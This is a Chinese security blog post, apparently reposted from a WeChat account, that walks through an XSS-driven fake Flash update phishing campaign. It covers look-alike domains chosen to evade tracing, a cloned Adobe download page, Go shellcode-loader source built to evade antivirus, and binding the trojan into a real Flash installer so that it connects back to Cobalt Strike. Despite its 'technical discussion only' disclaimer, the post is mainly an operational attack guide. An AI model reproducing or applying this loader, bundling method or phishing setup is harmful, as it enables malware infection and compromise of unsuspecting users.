网络攻防|XSS Flash弹窗钓鱼

admin 2021年11月8日02:43:50未分类 安全文章评论123 views2343字阅读7分48秒阅读模式
网络攻防|XSS Flash弹窗钓鱼

点击上方蓝字关注我们

0x00 前言

xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。

注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径

前期准备

  1. 服务器及域名

  2. flash页面

  3. 免杀木马

前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs。

0x01 服务器及域名

服务器任意注册即可,域名注册及CDN可参考我上篇文章 如何让自己的CobaltStrike服务器隐匿 ,最好选择未备案域名,以防溯源。可以到godaddy或者hostinger注册便宜的域名,可以选择一些与项目相关或者高可信度的域名。

本文中可以选择带有adobe或flash等字符的域名,如下图所示:

网络攻防|XSS Flash弹窗钓鱼

建议使用cloudflare的CDN,设置DNS生效后在SSL/TLS中创建证书并下载保存。

网络攻防|XSS Flash弹窗钓鱼

在服务器中安装lnmp直接创建vhost主机:

网络攻防|XSS Flash弹窗钓鱼

添加证书:

网络攻防|XSS Flash弹窗钓鱼

此处选择1选项使用我们自己准备好的SSL证书和key。

网络攻防|XSS Flash弹窗钓鱼

回车创建vhost。

0x02 flash钓鱼页面

这一步需要flash的弹窗和网页源码,github上有很多,例如:

弹窗代码:Flash钓鱼弹窗版

网站源码:Xss之Flash钓鱼全套

还有很多其他类似的项目大家可以自己探索,不过现在flash cn网站的样式已经更新了:

网络攻防|XSS Flash弹窗钓鱼

为了进一步增加可信度,可以直接扒官网的源码稍作修改就可以了,下载源码的方法这里不再赘述。

将代码上传到网站目录下,重启nginx服务即可访问到钓鱼页面。

0x03 免杀木马

3.1 生成木马

互联网上知名的免杀方案有很多,比如工具免杀:msf自免杀、Veil、Venom,代码免杀:C/C++、C#、python、powershell、go等,大家可以按照免杀效果或各自喜好来进行选择,这里为了方便演示使用go的加载器进行测试。

package main
import ( "encoding/base64" "fmt" "os" "syscall" "unsafe")
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { ret, _, _ := procVirtualProtect.Call( uintptr(lpAddress), uintptr(dwSize), uintptr(flNewProtect), uintptr(lpflOldProtect)) return ret > 0}
func Run(sc []byte) {
f := func() {}
// Change permissions on f function ptr var oldfperms uint32 if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) { panic("Call to VirtualProtect failed!") }
// Override function ptr **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
// Change permissions on shellcode string data var oldshellcodeperms uint32 if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) { panic("Call to VirtualProtect failed!") }
// Call the function ptr it f()}

编译生成scloader.exe

3.2 捆绑木马

使用NimFileBinder捆绑木马和flash安装程序

在官网下载nim文件,点击文件夹中的finish.exe程序,会自动安装MingW。

网络攻防|XSS Flash弹窗钓鱼

网络攻防|XSS Flash弹窗钓鱼

直接编译会报错:

网络攻防|XSS Flash弹窗钓鱼

使用nimble install安装对应的模板即可(需要git)

编译完成后出现nimfilebender.exe文件。

网络攻防|XSS Flash弹窗钓鱼

网络攻防|XSS Flash弹窗钓鱼

随后即可将免杀好的exe文件和想要捆绑的文件放在nim安装目录下的bin文件夹下。并输入命令Nimfilebender.exe xx.exe xx.exe testkey即可将文件捆绑。

网络攻防|XSS Flash弹窗钓鱼

3.3 测试

将文件改名并上传到服务器web目录下,从网页访问下载测试

网络攻防|XSS Flash弹窗钓鱼

网络攻防|XSS Flash弹窗钓鱼

点击exe文件,会自动删除exe文件并弹出flash安装程序,且exe文件已经运行并自动保存到c盘windows目录下的temp文件夹。

网络攻防|XSS Flash弹窗钓鱼

成功上线!

0x04 总结

以上就是关于xss flash弹窗钓鱼的相关内容,因为时间问题整体步骤比较简陋,后续可以考虑从几个方面进行优化:

  • 木马图标修改及签名

  • 弹窗逻辑调整

  • cs上线自动收杆

  • ...

关于xss 钓鱼还有很多方式,这里只是其中一种,当然也可以利用此方法进行水坑攻击等,这就是各位师傅需要根据项目环境进行改变。文中如有错误,欢迎各位师傅指正!


网络攻防|XSS Flash弹窗钓鱼



原文始发于微信公众号(灼剑安全团队):网络攻防|XSS Flash弹窗钓鱼

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月8日02:43:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  网络攻防|XSS Flash弹窗钓鱼 http://cn-sec.com/archives/620996.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: